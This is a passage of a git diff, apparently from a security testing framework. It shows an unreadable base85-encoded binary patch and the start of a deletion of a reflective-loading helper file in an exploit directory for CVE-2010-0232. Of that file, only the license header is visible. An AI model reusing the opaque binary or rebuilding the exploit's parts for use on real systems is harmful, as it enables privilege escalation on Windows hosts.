zP)w71po5<n6n#?2*l&0A=eG(4fqZ4rPID3-DITsVZgyBMO4#2ZMWI+8d;_4~VF!1b
z*l`bSD=B6PkpMA{FUt0x_&>z|UV{&OgpF@(gs>w-EZ?+Vfwm{dww(n(UtvQ7Kt{qV
zkGkLYbm|%ruObW7_aY1F%ll8u*LE#r+7}PuevKLNq{Ecw*CJD&vm`y(h{Kh`IL7Zh
z$JB2Xh8_s`w~F@<Z`3CRvS-8<<@weAM5*5SKMFhVCDk3cd7D`&h2z81P^7?t8rW+$
zU>U)2N866Z#;V@}qhER-U|%;MVD*eUPtahsn|x?cU`)c-i`N1K1(udp=Jq8#=!b*X
z3>G9>8!dRUvIqzWk?im7F3ZEs@({`GF6@!*$;Yz87y>tGsX|ClQ~2#YAYk8^Kz+R*
ziBVB;PXJb6@#7xo+i7KvmPWgG)Dwj;hj$25S48&a6-;Ip)P~j<g`0I2oVE0fuV}3M
z9*Id9eUqTgwOG&OdgcbE006n6qqmlIMvH0kaI-)kAUf=-M{p3PJ4bhPEB==OcpXdq
zH@xUEy9Y+(@o@WcGJ7&a57L<yBi1?N7T4+e^f1P|E88m2B@!d-0lvk^&RqTX&0GM`
z<O>TzTZa+ESJm4O{qFo61bEU4Xtrkn2J914LsRqmI30b^VPvf%rKv|?<r`$VPf{Ue
zY<O%~Z71`rDy_N7zo>~T!N0DlZ6NE}DBhill8$!L3}73}@{KvVM(i3e1JaH9#uF3q
zW(y5qaP|nDR?L|b-bp^IYC7tITVp)as80oS>-*Dw2a|&Vw3~Z9RUsjOznf>ZG}1M3
zaI_e=iH%X}ooX2y7MB~^SRiems;pBhpQh-npRgw*ohzHFvalk*iN9^1;Cx09J{hoJ
zO^v|5^M-`1{5&te=Q_WdCcgXa{C-|$M!c7Y_maI=S8+g%4gk{y6s|QRNx&MNg@#1q
zOQ3_x_v*f<7EB+bw=41M9A(t2W(ZL5@UlWr{5{1T^l3!jS9$rJD)ap981v1e3J<ok
z0k1aNC1h#>vFSWE{=7i+J*{!v5#HO8n1%dUgWvE~?F`;z-E>2`pCa-&vVjSb@Tlb-
zp{G>%K9TVDrUJ{u(x3;uJKYf1+`!hMoXPI%ru(AjtBIwwW3CGBp57x3^P!hmlH1hX
zTvhaxGfjAi7#j1H12~;=#m2Uj;p5TqzUc9I_4DNpdCBqRj`a0-_vH+yW$=Bg707X4
z*#)SO5KS;}$39)R33T+}CdM{b@i!rj=pf^=0F6#gdadwj1cx6pl;T%C!6N~YUQR;!
z`F?Iu;ml@<V#R(IG6k+`0=Zs(X&MUM$9TNlbo9*iz7)T?;#`2@KtY9k(p*&|6487N
zcvvB>2lQRi{)`%Zi04ArJwvbRI2&0>KC>8;)1S2jx2`xWEQf%L{+;!DU}D6Jy6@<p
zW<XI-FLwbq387EDJrBFpS{TQW)@hpmSq1Rx9`ktZ?rbnO)bkc@tzAR1LIJ({4G%v9
z!NU3-^{r}X03lv%c{24Z2ogR2EIxpG(O&xPxcgGTOd_s>r1}3ispYSP1QVznfidu8
z)Wu-G70C|p(Mu2{x&`ob?wAYig5sR^c>sf~5st#$POAdEt^KaCrk-OVyfk8xz#sjF
z5#GD>kieimy9hq;VSy0Mta@rdfj+umJOn`nW|1#l3wPYdy*QF`Ls@SJJYEDaKIH>>
zXK`s?4tLCRJ0STBzo!41CU-!ax(gba0Q2T<nV0OCBViz2h~R+zc!%+k4D=(21nr;x
z<l$FC+66|`5Sj$)1;v5o`3Y{&lPk6{I4HrapcSIKorEW&1Q9#Y#efIWawzv*-+F5S
zlR#<=PYE=fo1l?5<p&VbslQD-OZ?BS`Fg#+;TJ{HOd<GY<phyFMDT$P028ZLRZUS-
zk5xBv9i4RzfUGv-_=d(tGJ}tS7^Du*0}6xhgBJoOViZ*rdNm<aU^Ua^lzx3;7h)F!
zA2nd&TB3=sK`6g9K@fd{pzpTvFH9QY<n{pZ_x56Tmt#^{VON(-9jIQ2kj=5VEiKwp
zG8)O)9CRooBp{$S%{3$+Ky|sb^~XZxPE<e?ex#t#ozfqyy>C!O8Bj17p#NN+ih5lC
z_vHT>2!5VQCZ<*<Mo#7~CZbkWQZ^R<ncLbhINCZp7@08q#}*9;1PBVK)kcA<a&Hit
z4HyWB2NVd1?*G&Fe|V-h>WWj40cAoOn!$L-|B;FhuD|GVI~6cHYff?j=aZ5(-O`sG
zCoiMhcXf4n%5`fdPBA86x%ncWumQXnYqlhqP*Pv@srQDy2F)))p$m;71v60=Bnk1*
zL?TeM*3-#9@D2q=uoWr?aZCvlisI+eVW@@b_MCZ#0I9D_qppe67tJGS@hM&h<#SiX
z+my(SiW3KmJq})ToeQOoLT5~RD*WbBS%2>>>z3gYD{3wzsthRc3&eP35p<B`hA5{y
zj(DoZs-j>~Dfsf~n+i%|<wXT!=kMs*vVt8Z?0z+BNu&J>-kHE~nUmGc!Ag%MkzOoZ
zW~y9b8rXxW{acRKtcm7cmv><mUxKgl=HAQCSbmr@vB}f=M4LP?=a7jl#8>TLWD4cW
zV56uQDQ%XmhkttT0QJA|Pq9+qB1by0jsH3AX>K4O#{Z4@%i0<kn>f%L4QYMbZVaP;
zYl6QE;Bn_B{Lz$7XoAHv1|pls;E-OF9Ixhp>rdm=%%oBxp`y7?{`S7v!XG0M8*@o7
zHjm>x-15wMx%NIW;q?060N^0>04z934~#!jLtHO1oxTX%zs{F7`0X8=bsAE&Yx!iP
z>VKi8+r+=dwNCC782}{PKfZiwF%($d>~<+K2ujMtkoQ<w;_D-e5NWY)F+Vv%!3~m2
z_O9p=6H;e6i8><V7|Av3WxR)THba=?2*;?UI5cxE2fXCs6Tj0g9qOe5?9kuQpdX>-
zu-EFHP>;D_!G2m_@dg2Z(&;VW`4|aOg~xki?H~*M3q*1?^*RYTIzi|Be9{3m455x)
z{Ur6H>!5`kbAU;WWABn9xK+&?;~W#odD_!Sjf0{j2A0=7!iR*{?_G#7Yc)9Ar4sDb
zm{SCXDnxJry65N<EvyyVzhS4HHn;Z>;Y<bFE;JT#Ob%fkr~Yz8_<ViU6$=B!{!4qP
zVrL-BQMq)xU-+kYh761Z6dG)ebP8yYq|L-kiAbjZtbx;y1C9>L&pJL6Igff37s#+y
zp*{dpm`k&M{KX7AxXDE8xS*}C7%7TTOe7+B%tTWM&DOAeu!*75a*7G+lh^f<Mw!Ej
zx!pen0(;{Dcce4Z&Dc<@eXmtC<LuVynCsYVZ|!y$cPcn*=N5DQG6YLt27kc$-xU<W
zv6D@jAhHJM`Xmc{i^AmEk4($)WxawQOxhYj-DKHWAM?z$<8<gon72@I2upUaUQ?WT
z+BQ7%ku1HeZHO#`UxoN_`a#-3a1obrx7~5GB~qdS$5vfYnz9HX5Xi1{B#qHAvTMGk
znuzv?hbd<f9Gkxcgx`{QGI6W_X!{wK5#ms}4^AKsa0&RGxlN?pXW#1@P#)_^aSe(~
zR1bqbStU_B`x3p->^17UzcLO3o>BO&5Y@Hep+|AcEu4e-hDVXdie2?&-Cj3I@|D9E
zopu4D6>pRX5O*%88@xaaM)jDg*);EfJ%-~<<6l0`XG_I+kzpLGr8nXY7Wzh3q5&71
zSmyGe9H|^_1vt0s+~~G_*2OSb7(CB&W__6VM>O-X$=1e686$RfX>2P}XX|!x#OYZl
z`y?tLZOdM_J~qF<kgtO=;ZiSe(5MdqX75S=Kt_i$S+PParA78F@DvV_?J(a!u&)pe
zE+u%v=5{!((3u1vPnuC+bon)WAA%YEe%ZulL5=U3;xfUd{Axag&JzL>qJUL~<L+1;
z(U2qwv-XZ>5~p7EK!f*U#_~H~g@meP65Y*AwNG{3;~e&7;e}EK@J&eFY^5YjZWod6
z!vw!Vx$_%^n;B=+>BI^O$}1xU@XnfzbOS65r?nMCaJ4Nrs<8iZMR`Ai3wc5z0YdTQ
zo27;u@Xc8CwIt!)IL*tPK`c^05C&d%ZW*O|0MaeAVg09C?@d>NaBP3qH%aAiFXCx7
z7NJ#yzQ5ip5EzfgR0tfzpJQ9FV0V*DEZa?@@t|~Y*7i+lI^~FSEOV2li}nlz=bf@f
zzOKk7PR#c$g@BG!LTIXGN3_f^L^VBSo7D}{Z_L0<)b|fI=HS7qH|*;p`m9Dh?;!}(
z+=Oe1B<G0=DRUVk?or`59-~(baGRy(C02=p;Ge-;Vf+f65lzR4c6O8`Yg9UqRYik}
z{Dj#-$6n?NewY<nHMiJ(2jTzp9|ZFXTciB?r4MZhw++qn@Bb1uOTmPM!J>P_Cnpy_
z-eui;K`agQi3Bdp4m7sS%Y&9S<;!~W=dHcNRDD3nCo22VvgX>Dn$ZqD-!u8<;`3tv
z+=RSyGFa7rC&wxr_ZLQY_NeR%QvL#ose~Wvs`sq6{+-Wrgh`*olKWzlwv+ktqzny^
zO_Y?ZA~H&KT<y@Fw+j6H<uGz@r^UbT%L5s@L6EB0$11&R^3z3hYwJ&XR(~ysKeg(i
zS!#?Rp&<I`7i|3_*q~cvYM~(IOBY;u8>OF^E3GM2d5EyNls7BoJrX%`k`49v5|Y%-
ziosy}pd$uEyEEihJ8E@%;YL<Q>S}WP6+J}=M3Ht4mC4N|gB5gGo|D&iw#tOggF~^q
zqODzgfN6;-#%`mW;o-;0L!=to<`sSk?0B0Tb{EASOj2zzqQ=fmuLRZb2_w;hFWd=I
zI+tsA5&6z!Lggk$jVD`d?>PL8Vfsz320eJt6Z{)DK7!xCTUZYpQ%=@iM+_S(V6XG`
z2}1&tUk$NZDk*gqiaDDTypM<6qqmLJY!H!nl{x(uDu0)+vV4eO7T^G#k*wvian)rR
zAJ^K8V8R;c;shBj(97x|zwF-4M~J|oiG;|WmqWg)sPD*Ye78oAD=z#@Tx9F(_Hd$Z
z+o68Fdll0KJk?D2C)TO0;H7=*$jc_uqiMwsM2kiey#H97llj2#?U+qKX0^T1>F>X!
zb6|KDb}@M<-#vOD;Fuz1`b2R2jon``2cGjPU|`M7x4tM+UsErKbX+PoN#x8ZG>_7`
zlsRb2WrOC|q|P2!1WGAt_K1BNV~~RJ95eCyprMn@LaF!lyT~{bnI~i1;O>Sy1de%1
zKtM*eVqX-8xTmZo9zuW|vC&;RBqwkgGlg5%-~T=@f{xQA5z$uo^0*n}!v8A7!QWyO
zg={W+cm&%jRU--xcDz}m7;?qqmtSzA5u1aDur^Y(tX5zXLOzNPdXndg7C)gV#+?X|
z6vrDEQD)z}{n_K98p)gpWNw7vZ4@Hz3RrKH<~JdG!Mrb*7WQ&zSi5#$y3rI7`gMNw
zi!;C%V=fMs_Lr?@>n%}e2ND0PWqSOLN2pRowpNxVB7i1wD^BB2z04TC3@l6^24GOR
zFK#NZmW0ggwo-ZECA-w*-XXsY^}gquZDldy$f#m5K(q3<(hchJFQ$6gWAmo+PuXUN
z-^EPklz3>-VwNYVOSG61IMnZ{h^x5dC0*A*?=N9GnYV}n&bUMLcz3R(u)YRk(!&in
zjd1znz^yb@w1nBblA73y9)v2z?f1}umCy?`a47f4uk*w~>^xM0i@3BwzxBQ}{qdN@
z{PLddp@enbq>#cFU{Z6!slXU^#5ngDB36G%GinBwAs{y(w#ibA_X<N(s%ijvmSazL
zq#)5mw*UI`$55<=XrmNeFXutJ@*F9ML-CU9Efr&)Z&a7P(<EX;iA0U7v66c{>_;gv
zw#%gc`rzLI2jx0A5srN)oG+5<kAM&iW4p=HtX&!;mXS9Uj5Z-FCVupw!-Q8janb2x
zn0_MjSQsLtqBm&1n5M9gfntZlb37aSGj95}h(w0bt-WA6f18W!%<fHOP88F$?C%#u
zXeW$O{Bo1iaE`TIH)}1HPx>@E+KTT<h{E3jZTb|?<D$gx#ul<EMxNYkUHoYgc9VB>
z$Ss08MMqtqm8cY+fTbW(#CxqEvq;f2qCZZefV0y<y;s(}(_1ZC33omljP@J12>8%_
zTf&Yb#aulExbYlTF~Msp+rkn*$lbPpqJkM?SundHe6-&ex^*xMv<xn+PWQ$~p3*$!
z6`7kZz+%7U^5D671)->JMdYYuwIZ=7b2MPgKgMH2tVKs-4f4vnbm7dKH#X}Rb=%@6
z)-<b(X%u)T&z~TC+^Cbvafbih_Xn5vH~v*sL6)#@lvM|ctkdTKAtC{8B!-Es3$o{J
z#+P8m1P@E$bc)%E3J?Ck4v39xo1yY@UYd(;KvE+*dti0h#Y>V=vB^(JhEv7no>2{z
z$fr6BYa}M2gFaVSViZX;{1>1HM~A3mySN=OF84HD&77>a=Qm@?KV`n=<uX1h)nL`K
z2Mv}!p{P<6ZkLKw_{oMm5{wy^+uw1v&(hG|Lja>U-wrd>$TL`mMeJFZ%t>^pcOJsy
zGRaj-)f(v!n@q>%I^v{NVJC#j3#9%l`GJHDq)Bcp(W@*T%xc-|(nJ0x$S~W#olG+K
zTNS~eWDg(17}HH-+XHilL+1(gjSz)?rX(($nz8se?pj2$=<Lu-JyXy>VsN(f4HnR;
z?zp2cvev84+C6e5QD#rP5%$-s5TMa)hZKAu+HB#bPCgx1$=Y7u%MhqjU^!(LneywC
z?ct_Eq`)oIVBpma=(G@tXaBVBmQr6=KxnOIY--0x%X}b%*3_3qJY=7*)Zk@6F!}gU
z3!Ai;aw^S~j)C^-e#&xf1}bqT=kgAsiGTBhcc}5w-{&c@X5mc-(tE^djroE{@#yUG
z3mUa2MP6=wgnWefD}79gjhkvga?fU~L0D%96;J0SJGC$qBRJ-FyR$;9^2^`$-!Ykd
zdJd7=B_S-7U&+US_R+%Nv=ozVAv=_hKlxK}%1UbG>69Y~gcENgsQ$U^eC7M7h@qO<
z*PorUum2oc>7?1^@|bq}OrKcJB~6dGQ5pTl7MC%T?UC}{RmW{ev*)H9isj&&9FW&E
zRjnLz=c84t)W09E8E0QC%9kokBuoW=I=9krmIfit|J7ppG*X45;VZ5Dcf^=K7o|qn
zfGmGiFVy?XjQZ8TK2a~^2jZvq)UV5w!z78@zmG~qv;RH;KNf0I<!EeBxOjV`1vyhe
zKRE;G3Hbg%e<PU!7a8dwTaqCEZ5&pO>;R)1J9rmeepMb&=1VN_C&}n!d70p07>I&t
z>NuB%@>e$*Wa*uZGhNsD$te;kB`bYx&ayC~L9pzq#YwKF*}h7+)Li5J%uH1NwcVqV
zIN1=p%~9yZiCQy7F5bkgvvSm%K4_K7IIZCcYN_a`Pnqy^c<X#O?EFqGvU^Zdv*1ch
zT72Z^kWR9)@F_1An$Qg^J9r;c#-3P4`2Y;~U%IHW+G61ZhxkFdV7$-%N(NAUzVJsW
z7ebqsRoBGw{nDo*b_Z)%$YwOeI{_ZJh+j0uA4v5D4tCnYO<rS!EtR9h%zdt2aFcT6
zs1FW?Ybz%Xawj~<-M5ZLN%``O(rOivM|`sE)-3b#Up`}0XfQzvVvJ1oe_wKs+<@cT
z>G{#26y1Si_ijs-Sifpcj>_Mw{i;ss$7ePqeXPzv23NBF@~Brmavo2?R3v0Z8&Ao5
zhv>H7!h$NfJD2H>eLB%scTqh>01frDXX6zeB(FzFZq)-;R{@iwfcQ(jW;qDv{RYh=
zR3R!jzqEPA>*sexWe8U+p4&U_$OgO~o-xm^EE`O9i{nb15yLet?UyROt}~J~G9T5U
zo0{|!^8=|I-%E3!qSps5z(u+a4yHxFOdC{bWm0|6<qDGe9WH#n>8ownYbXOfD04ba
z_VF~`#v^Hs!9khLuChLj`&hknTj<*z?3N<ITC-R&ZOIzDbU$9u(tW1kr}gFo#!L7R
zy4}&WD>3l4(x;BWg=}wi^<oGY`ziSSud2nJu+Kh{#Jh$w9a__aBFj;`t9mcwnmn*T
z7IyyE$c+avtRuILcGm1aPUXt?<gaZCNFvqSI2aH*ozjjT1&xaqC7t}M?M)ao6C=O0
zKch=XZpvg{&QOlXyC08y+%*siu#;hzGxZE(nxj8kJntWC$9F|-@#z)srnJV3@Tzmc
zRMS@<^^~YvmY9m>&sDUx@@PKuN(?Re2G!Jk(-jPQn9+D6<oI%-3C;x^fe3=Da|-iz
zX?LJMRL3~<k~$VWYIg$!d@CarlK`+d2j9T|&2M;GC~y%!-*oIk0|A-f{U7Bw%!aTw
z95N)I*Ob}5?OdM4TpF7VdH!*1r%{8^RnS0b2)cBZQNakw7=o}44K<t6e0P`Nk`j|r
zlvUwKAflW*_B?ZCW_`V{_)Jgx0M0JqRI;n?&FX0LF!2W7^zD`)ON`gzix>@KXd(GS
z>vAY~b^HecsAI;_9|;Hv6;hte=kT&2c)5~!lQ<#98vHWRX?^wg%D_e$GJ=2qKAx+j
zCdm%S2~k9c%SVIJJpxXkXrO$0K%aEaM)P)y94EWg2Hcki1%=M>!g%%NBKk}d8M&h*
zk-=JGYfcm9BYh{y^b9hDWbUU5h@XLgWQWA%(vq6=kH2Ug4W1Mh7!qsGo?_f0NtNe|
zPDm3vV|0FD`y%BwQ7G$*17DEPQWJ^G2lyNBBxi--4=I`=ef;jfU$CVL3eY0>LldMH
zicbBOatanzM~qk=R8-Uxy^ReKLP8ok$e>B^W?%QzlSni`VXh^9xn@=?>3|$omQx$}
zFXf&tAW|ksDg<NE%3U`Xg(j6LPRR^5<x>;qSI|E=;UN@V=2D&DMq-P|H)uz&#c8V7
zPA{~yy6NU$M*fl<q~W3{$G_(0xsSpPSI}H#@$Dw#JWE!=ZrAFkw91j;LtdarbJLf*
z<ZOrOBjt2RnnA<!_R99woj9H4cwfcrWA8Dc6(c=~2<b975mH^~0_AD5eo3Gi(1ghR
zTY$7EeOD<MmLrUX#VUs7&Qipj({5lOyGiip3V^O#Vgjg!sFYlHAyEfMmRdsPktCM;
z6|K^%mb4oNvNh2y5EET4lop)BWFcLlu?dz5+WgxKU{Q1GGOBj}i{xoE5ZxydFitI!
zwKzX(9JMa$9IUxPfxZ>yalV>Eo3C^y$dAG*U3c?gJ&f@7g2sdl%4(9onVZ*T`wCf5
zC~wV-JYJxjc{Xcb#^VgVnOfZJ+$D0URgQ9k<FpV5$lxxFG1L|-_w$;yhZ;WFTg;me
zUbOpXtw5KOKFk#Ig^*<&SWZ+%9%zL#e@gBjX1)VE-A~3$?%j%u%G(kgQ*?l~hYX2d
z+HTE?77lRIS`HAhaq<v>OR}<J1h3#Zk2Q)Ub_T<!LT^=8yjAfK97K4kAk?DTN<oI;
z1`+Eh>i2`ttREh<GfR-1k2-IK_NR@*Y@GuTOfAGt^^ud{KZI<fY^l^vb~5!NAr)N`
zU793XqO}$b54Dw`4&5?-Zi5j99h)PmyLEiR;@XZ9Ml2lJUM+M`(z)Hfd3|GL*x*bY
zR6*UxwHK7-c_3gD;=^ZeM?$2ikDJ*64d8Ex&VkKu0ArU1MIsRW1L@NiFLcE`)b8+*
zSf6Lrk)Y8Ys&h(c&)#nj=jLzs!Vn@s*_%Q@46whWpZ0Wq5a2&EcP*~!8?#ry!*gZQ
z>)A5&LBF$z;OHC)-`>AE4b@RwMDRNarVSHYxDmn{xuiO9haMriolqSX^@yS<W*_od
z8c?Lh7}}62jF%5(XD2yog={Y}^zOfVN;WNA?T?^K$K4M{6<ZMXl_(Ff{zhuE*-BRl
z#CW4?+A7O8s$f&4QX<mV%l#%Mc!oUdKK>iJFw5#}e`Ldz_l6pbBMfT6Ssid?D6%t(
z4%ZB@(7K31mpI1y4S5)^9Y?ob?T<U?dM=1t7G5uAl~FJBabgKxx2@d_4x9Soze(8D
z&FPU>{=}PE2ZB*lH;Hy8Kcn?NR1XO}-Fw;t#Fzp2cu?rC;L_Sn40M!@Y75dc@ayJ*
zvB%&N&MY9Ad58dWz#~ikiV|Y0d!^l5s<A_XN@uujjWk>iOi-^0AO~xTtRGj_*zZdr
zJP!t^>5824XnKn>f%XMD7I-qy?feD{EQtXA1QehpwOzPF%K(hIZrH*@V{mB30mnJh
z^Wf2?)-=m~@xx$dlQ=SX{05hW!LLn1Fa<sX8hCrG2x4OqX;23-E&QWuGuStyQ^((~
zA-uGOcWf0kZeTHb>m&}0eOgKxbUuN#LB70#e+>1$GycZql~^`Y6t`Hr4#I<Dg0A}a
zuW1r)14pE-df5@<^JeMwS*g|=>b!JpcWiSNP+hD0;C+qt<IFxTayo`H*(fquMwcCU
za0cvuN+@T2<fR>WF!#xknR2ryfoh;8-+Db+cSgZDSo1{osD<ycH|3WlJ%Cr=1e-C>
zK8q9bWH0fz0+LfC*on81JU>DQe75`N7VNqYPNQ>jh<W@c^%ah)ckmxy#Xsoo#lNq9
zTlf8I+|O2b_;=X$**Ao(M4lp5I`2mz++eDl*sj9Gv&CU)p}4ddMp5jPS(`Coa2`1n
zJ0~Civ^MA)9#6dntm$e9<7dE@)1dvQexljA%=Iu!!!woQ!qBV@=~o?aL<Sq$$Cpbg
z*k-YP3&yP^R@P9Zu^#+=H*6tLq1%UPi-RtriwJc|J+_?vTZ}XYwE^Y)^w?)^Sp-g>
zsgES8Z=bjuSv&<sYMPhj+%UG`iI$m_8Xd;Pp9<j7A3F8)fqb<>`Mg30I8hPYR{&f2
z;%-)As4U_G0yc)M-)eHsf!jYH+V&ycsZ8`}h=0c^0E2a=hX(QVtMhCNW$g}h{1P`+
ztC-lR&-}(!*%7(ifjsa!cU414L=xGB)`<FQ%y@oLE(Ni|V$IVO*`uXwM}GZ)T8*az
zw`0g09bXLB)<yR9sfZq(RHfnTdT9Zk{3{I;AN%cl>x#^V-_w7p%;m0!!QIC{RXUyG
z+UsoKkc_aB#?~X~`rom7A{0(~TuVhQ(#$&@>@tlEwv@#_dqAym>%3X-qG|1daPL8h
z)o0<7LMQu;d4Sk8@6k_LqXsJ^(UTI1SMw|7*vpNF9UQlfG4x6fAau6}y^co;R`pmX
z(LX}m_N|BD>xiROXh$e-jY7fmXE!MgQrSARgWeFd!V=AY0cf>{ma*}PRy5%4-T$rY
zZ*GxcY{if4J+y*YQ{KN~Z#LZp6dSoN{6*BqqaLO|C67EmU3qb#`RZ82`oeo~oZPp{
zDzZe6{Z~wF@-=-w3r~CPlWZH|C1=Ks`i+>qV`$swciETU2%10?1Xn?cU>V^GTwcI8
zFd6=()TvdBKQq1^mQ@+63Se7(D0jJiUfk}p+$@{COAa4j8f4(Vac@8n_m=Z%Z@o-z
z8LC@bv>L>7YUOM8oM53V1WoBWG~AM9zls@i?YHca>rgE+#y++?PRYLwzY$Ky@bsp4
zOrFd0G!~Iu;Id7<k%v&7gMUxPy7&}A2%{d^epli5{Y@p-7oT=&&pSdS_nfZpxKP)o
zH+1yESPh+h&{3u<3sR{|TfO^GoaYtS5Q%lcYagfGva`52AlWqmMIhnD&!F)JXlivo
zNA-UPDBb7n>lFP(?F@>|T6*{VQo4cC#1VhMM0pnYFOn&x_CJwK;{P=o=4$I;>1b#0
zKfuhsAM@9_p1ji^vzQ-1^M~>CzXC%4Yp!HsU@T`s@8sr`6eIT^C^O_H7!dkG-dIbO
zU8uexBE+Bs7GvqMEIT$5FN^bWBiBqlpTU@7knJuI9fErPNN`Brwi_%i^XFA|RWpJr
zL|I22OJvZ~l&AK)m&`b5AJ;zRSXn-(-;gM=keGuTa>tnS)uv5@J~{*dq>x8Q*^I`1
zs%r-1DJdr293)>9TR`soF?&Y-q*hRyLCbYNA0QUFHlx;c^ygITVpr3Lfik4&E!3#W
zu1U*4Jz@g~Xr|Ig(g3Z~VZ3YTz$5Bo>KOQAhDu3#6_K|CJG?O%IjvbbNs0UAVf}0u
zO~>AO`5gAYf9IP&=;K0VJ)GfBu!4TjU*`XR0sDVJ%k+*`HdXN*@&k-$At&PFJQ@a6
z7WiCc%JKfh>R3RkQDBbioJn#2Xn4wErE?<vCHB$na?5ZiF@ZB?j=sOLj0Ao@?dxP&
zu=MV~{Vl04BK;f79mj>nHFbXL1_UuPgF$1urkxWDvrECIL7lDtrh$P3McQEik3(67
zYHMdl{!E^%=&o}KoP|B;4Yu*~Hq%57urby|A|?#ZE-GK$#v0j0!%|jaB+I8kVKRl=
zA)8$CD$~yR{PPe0(g-p{o;83|oMLuh8jIX0l6R&a6^{#7WM!XuC;oID`=BB6?9a_r
zEc@{PwLNdPPj1_z^J0-$q_9s!m}pko&4QIXZ>cSP=b93xFPE2Lxhb?zKdUSFkcZmI
zb$2>Lo0(q4{AWz>{>{oe{i@x$^JR(e3TOR$?R7Y*kl}-QouhAL-Xi-Qr6vClT`&DJ
z=fiFG%<{EzX`U{wCl}fm`hAYAIa<8PO6b2*FMr&I(=Toz#n@xuT)#w6wDWQn2H+|r
z1_o2oW2`K>peR4<ZA4`LZ8w3su!cYE%_p3j8pK@hMyzJ^4_{H^@ae0-fryF9naM@d
zV<&C8WA=aVVdrTtyn2&FG@8T=Sl_)l^QO*t^ZkO_Pnn`@?%op&g=-d=^qD^8*r8r?
z>^bw(X@&7N$FiLBU!Ph&|K2{!or#5B&7PBf`NVjAWZm=R?d+(ZWnV=OI%tOUt?8E+
zowF-)_dEIQC^d`aidwyiVhdQKn`Bu|9XtB+>jgQD{n@iF=1H#ImbLZmvRg%4*4@hA
zYQ5@qX6D~I=kn;X-`QzqVoE1%jtPD(+xeGuo?PpfVhvy0XqCxvftKw@re<_(=09JZ
z^Tm3uoAG6bHCrd2ZcsB;JZvGI+jet7%f#xlU$Vd6Srlhzxl>4~Ad=zeia6P*rt>#!
zrkWhwdRkR$)7sLU8OuJ~o2|a8cS*%dc($jD_LIvFmEY@>noNwHAGVjj*PdsjF3)vX
z(chu%f$=Pdqc!s#UE@-A+-csrU{ckKJSNU#>ja)za6S1M&H3Qit|<x2bUw^g{h%^i
z@5}3I-ZdtEE;DY+EUGIv+mz|#-^lzf^n`OxUZNG_&J?+X)HU<=o&J`S(a+apxXDE#
z@!Ix1*Yp;(w7%JHvy9nQd#S`C4=(;k5gyWMJ)8HKY&g^Q+;{Gs+kKU_UhfK1;_vvK
z`1>^_r{68*%?{<`yQJ<}SnMi)r>B1`eDbBIl2)9V2FHFKwBVcKvMj)Frb*g8i>Et;
zH;6s3ec*JqXq`y^jgU)gY_5HJEuqXB$9Uqu<O=?x&HtmdEI%FNm?n^u^XZoCr#B%_
zD(?PCU9e@JWa6opGJgz@C{307W7_lEH$J)ffLo8fOw9b5MXD=jCY-S4RIFNX@U!L0
zsimy?%7LE8Rp$E5d&B~~X4f$|{Yta}-+A?%|9w3<?Ce+dp60N9bToLM6H?#c9CG%C
zb;#A&NF^(miycZ!(#?|D)dG*4tea)IGW^Dy_m<^6j29&8IIiuD?NE5U!E)P{xpzL<
z>(<-rPTzR+32Vi_J5#D>-idUba$J<P{c<M5jO3FA$D*^9=AX+DSkM3CpG<Cc?PB&h
z`xmkAQ7K-#>Fw9N;%mT#jsHL0R$5j+>GSo^sc(9JFogYnc-!Hzt8~QXeAAD=XCK*i
ztxqrTn$Uyo`W}DE+AEC1m)zK8vAI_}oaJcv-~AWjvivMq>(xK}&v{;{sHMj`TSZJu
z|JeEM?SDjP9|+q&>&eo(DXT@i#kH7^b}Ky+<o_S0{pfHHhrI&NeAh3nKABD#GHK^m
z8SH-c=DJ9m-Juf~AJ?vV8g)1AdhUv_>lv%prfpv=6}5cvE4Se7yL0bei2a_u^m58=
zjhE~n{94R6dC$^eJN5D7^G7~)>+W3b+q)^i>vL7wf39%li5D-|<^R-XOZDgBF1syy
zn3YXiiJRwvl1fkVpB?UD8~2;1{7u_`Kku8#*6ZfETTQP<WvzccBg;L1_p-~^WG|b>
z%Wo2T{%ESj^&>mDSAOC6%<?hFb6KLxp9H@p%O6jkp!wM4T(VKR@h8<;kC}h+PZU_s
z;WR(hUgc5oCy(jX&X-@_ayxGD(dzzXldVrPZMUYE@ov3ta<=WB0Z(*xPJ5cPPvb@l
z-sO!mlqQNiI{RSBzQ_ATH2#BE%0N~*{fR(r8;IjB`2xHdnM4>M3!HucwXybErP!n}
zF(`I0F<3IF05yVu0+__vLhuOI4KOe;1s;x!RNcW>Qt1_>q;WxwU}TVBP^g{o+{5}L
zql4(WcOZHKZw8nTaSE<=S}>;o3v!0ZKnG&C3$|(t**=5dEx+u6_890)$_3fSu&=P_
ztlmlB$Q#1zm}|Qr_A!FpeV(9wD6Y{<Mz+2n#|3Pig8KItULfn2MzwE4vmSG46SDRG
zX@tCsupYM13E2f7CN>D12HLp6Ee7m@0Pg?(=q|t<d_;DEemTi5$Ut^Mz-!H|Cx9;a
z;3fSJ6b7g+fJ8ZFgBCf;V;gb00MR~0wz6SzLYW)TDi|Fg^Dou`WHnN(V>W`3Jw1mQ
zD-lg%WXlCM^ZWr>4x<xhx=#Sb0J7zn4N7Fo&o&X^UqrM6S1y8@m&k6oke?q1veO}O
z`zcVE3*^sMM2~gMCK9q6>RU*51Ej%(;*68Nxu9_0aNOu2$QcuoGLf8ttGq&v`pQn6
t&Oo*(fWiF@ID2QOad`tR3dmUj&h`P`tZbm-iwg)Ju`n>K0~*J`008Ve&Uyd<

diff --git a/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.c b/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.c
deleted file mode 100644
index a88d1d946e..0000000000
--- a/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.c
+++ /dev/null
@@ -1,116 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
